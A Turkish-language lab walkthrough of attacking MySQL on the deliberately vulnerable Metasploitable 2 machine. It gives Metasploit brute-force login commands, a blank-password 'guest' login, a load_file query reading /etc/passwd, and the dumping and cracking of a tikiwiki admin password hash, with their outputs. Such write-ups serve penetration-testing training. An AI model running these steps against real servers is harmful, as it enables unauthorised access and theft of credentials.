Metasploitable 2 Exploit Mysql
Metasploitable 2 Exploit Mysql
Exploit #6 : MySQL
Mysql çok kullanılan bir veritabanı yönetim sistemidir. Servisin çalıştığı nmap çıktısından görülebilir.
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
İlk olarak mysql için brute force ile kullanıcı adı ve parola bilgisi elde edimeye çalışılır.
msf> search mysql login
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
exploit/windows/mysql/scrutinizer_upload_exec 2012-07-27 00:00:00 UTC excellent Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
msf> use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 172.16.52.133 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt
USERPASS_FILE => /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt
msf auxiliary(mysql_login) > set PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/http_default_pass.txt
PASS_FILE => /opt/metasploit/apps/pro/msf3/data/wordlists/http_default_pass.txt
msf auxiliary(mysql_login) > exploit
[*] 172.16.52.133:3306 MYSQL – [0721/3832] – Trying username:’guest’ with password:”
[+] 172.16.52.133:3306 – SUCCESSFUL LOGIN ‘guest’ : ”
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Görüldüğü üzere kullanıcı adı:guest ve boş parolayla login olunabilmekte. Bu kullanıcı adı ve boş parolayla mysql üzerinden sistemden /etc/passwd dosyası alınmıştır.
msf> use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > show options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
—- ————— ——– ———–
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
SQL select version() yes The SQL to execute.
USERNAME no The username to authenticate as
msf auxiliary(mysql_sql) > set RHOST 172.16.52.133
RHOST => 172.16.52.133
msf auxiliary(mysql_sql) > set USERNAME guest
USERNAME => guest
msf auxiliary(mysql_sql) > exploit
[*] Sending statement: ‘select version()’…
[*] | 5.0.51a-3ubuntu5 |
[*] Auxiliary module execution completed
msf auxiliary(mysql_sql) > set SQL select load_file(\’/etc/passwd\’)
SQL => select load_file(‘/etc/passwd’)
msf auxiliary(mysql_sql) > exploit
[*] Sending statement: ‘select load_file(‘/etc/passwd’)’…
[*] | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
Metasploit haricinde komut satırındanda mysqle giriş yapılıp veritabanı görüntülenebilir. Yönetici adı ve parola hashi alınabilir.
# mysql -h 172.16.52.133 -u guest -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9602
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql> show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+——————–+
7 rows in set (0.00 sec)
mysql> use tikiwiki;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select login,hash from users_users;
+——-+———————————-+
| login | hash |
+——-+———————————-+
| admin | f6fdffe48c908deb0f4c3bd36c032e72 |
+——-+———————————-+
1 row in set (0.02 sec)
mysql>
Parola john the ripper ile kolayca kırılabilir. Admin şifresi md5 ile özeti alınmış ve cleartext olarak : “adminadmin”
Sistemde tikiwiki olduğunu gördük bunun üzerinden gidilebilir.